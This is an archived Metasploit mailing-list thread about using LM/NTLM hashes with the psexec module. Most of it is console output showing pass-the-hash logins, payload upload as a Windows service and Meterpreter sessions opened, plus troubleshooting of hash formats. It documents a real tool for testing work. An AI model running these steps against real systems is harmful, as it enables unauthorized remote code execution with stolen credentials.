Metasploit mailing list archives

Using LM and NTLM Hashes with Metasploit's psexec

From: mathewbrown at fastmail.fm (Mathew Brown)
Date: Sat, 12 Apr 2008 11:53:49 -0700

Thanks Kurt,

  I was able to get it to work using Metasploit v3.1 although v3.0 gives
  me the following error:

msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, the meterpreter exploit is only giving me the core api and not the
stdapi when using v3.1.  Here's an example of the output:

msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \hAKmOasU.exe...
[*] Binding to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl]
...
[*] Bound to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:192.168.192.132[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (KSpLNIZa -
"MzGErdEaSogkoVTptHmQWyOovKyS")...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: (KSpLNIZa -
"MzGErdEaSogkoVTptHmQWyOovKyS")
[*] You *MUST* manually delete the service file:
%SYSTEMROOT%\hAKmOasU.exe

[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Error: no response from dcerpc service
[*] Meterpreter session 1 opened (192.168.192.1:4444 ->
192.168.192.132:1033)
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel

meterpreter >

I tried using stdapi but it didn't work:

meterpreter > use stdapi
Loading extension stdapi...[-]
failure: Broken pipe ./lib/rex/io/stream.rb:40:in `syswrite'
./lib/rex/io/stream.rb:40:in `write'
./lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet'
./lib/rex/post/meterpreter/packet_dispatcher.rb:92:in
`send_packet_wait_response'
./lib/rex/post/meterpreter/client_core.rb:114:in `load_library'
./lib/rex/post/meterpreter/client_core.rb:156:in `use'
./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:249:in
`cmd_use'
./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in
`each'
./lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in
`cmd_use'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
./lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
./lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
./lib/rex/ui/text/shell.rb:121:in `call'
./lib/rex/ui/text/shell.rb:121:in `run'
./lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
./lib/msf/base/sessions/meterpreter.rb:170:in `_interact'
./lib/rex/ui/interactive.rb:48:in `interact'
./lib/msf/ui/console/command_dispatcher/core.rb:722:in `cmd_sessions'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
./lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
./lib/rex/ui/text/shell.rb:125:in `run'
./msfconsole:77

Any ideas?  Thanks.

On Sat, 12 Apr 2008 09:24:54 -0700, "Kurt Grutzmacher"
<grutz at jingojango.net> said:

The format is LM:NTLM and the only way the library knows is by looking
for
two 32-byte characters separated with a colon. What was the source of the
hashes? Any pass-the-hash technique must have the direct PW->Hash result,
anything that has been encrypted further with a nonce won't work. Also,
NTLMv2 is not yet supported so your target must negotiate to NTLMv1.

I just tried it against a Win2K3 server green install without a problem:

msf exploit(psexec) > set SMBPass
6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass =>
6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \tCmiQnDv.exe...
[*] Binding to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Bound to
367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: (iQjTupTr -
"MniZYWPVdyZvaRRSNZZIGe")
[*] You *MUST* manually delete the service file:
%SYSTEMROOT%\tCmiQnDv.exe

[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Error: no response from dcerpc service
[*] Meterpreter session 1 opened (10.1.1.55:38241 -> 10.1.1.183:5555)
msf exploit(psexec) >

Kurt

On Fri, Apr 11, 2008 at 8:21 PM, Mathew Brown <mathewbrown at fastmail.fm>
wrote:

Hi HD,
 Thank you for your reply, but I can't seem to get it to work.  Also,
 where would I get the NTLM response from?  I currently have the LM and
 NTLM hashes, not responses.  I tried setting it to the LM:NTLM hash
 but it failed.  I then tried it with just the NTLM hash and it also
 failed.  Finally, I tried it in the :NTLM: format and it failed.
 Here's an example of what it tells me (the hash isn't really important
 since it's a test machine):

msf exploit(psexec) > set SMBPass
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
SMBPass =>
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
SMBPass => b9d2d4957b330b503cc792eb6a55bb1
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, how would psexec differentiate between you sending it an NTLM hash
to use for authentication and you sending it a password?  In the example
above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f?  How
would psexec know that this was an NTLM hash and not a password?  Any
ideas?  Thanks for your help.

PS.  I'm currently running Metasploit v3.1.  After the failed attempts
above, I verified that psexec works fine when I provide it with the real
password and not the LM or NTLM hashes.

On Friday 11 April 2008, H D Moore wrote:
I think you can just set SMBPass to the NTLM response and call it done
(thanks grutz!).

-HD

On Friday 11 April 2008, Mathew Brown wrote:

Hi,
  After running info windows/smb/psexec in metasploit, it tells me:
  "This module uses a valid administrator username and password (or
  password hash) to execute an arbitrary payload."  I currently have
the LM and NTLM hashes for a valid account on a remote machine but not
the actual password.  How would I pass this information to the SMBPass
variable.  Should I just put it as LM:HASH?  Thanks.
--
  Mathew Brown
  mathewbrown at fastmail.fm

--
 Mathew Brown
 mathewbrown at fastmail.fm

--
http://www.fastmail.fm - The professional email service

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework

-- 
  Mathew Brown
  mathewbrown at fastmail.fm

-- 
http://www.fastmail.fm - Does exactly what it says on the tin

Current thread:

Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec H D Moore (Apr 11)
- <Possible follow-ups>
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
  - Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
    - Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 12)
    - Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
    - Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 13)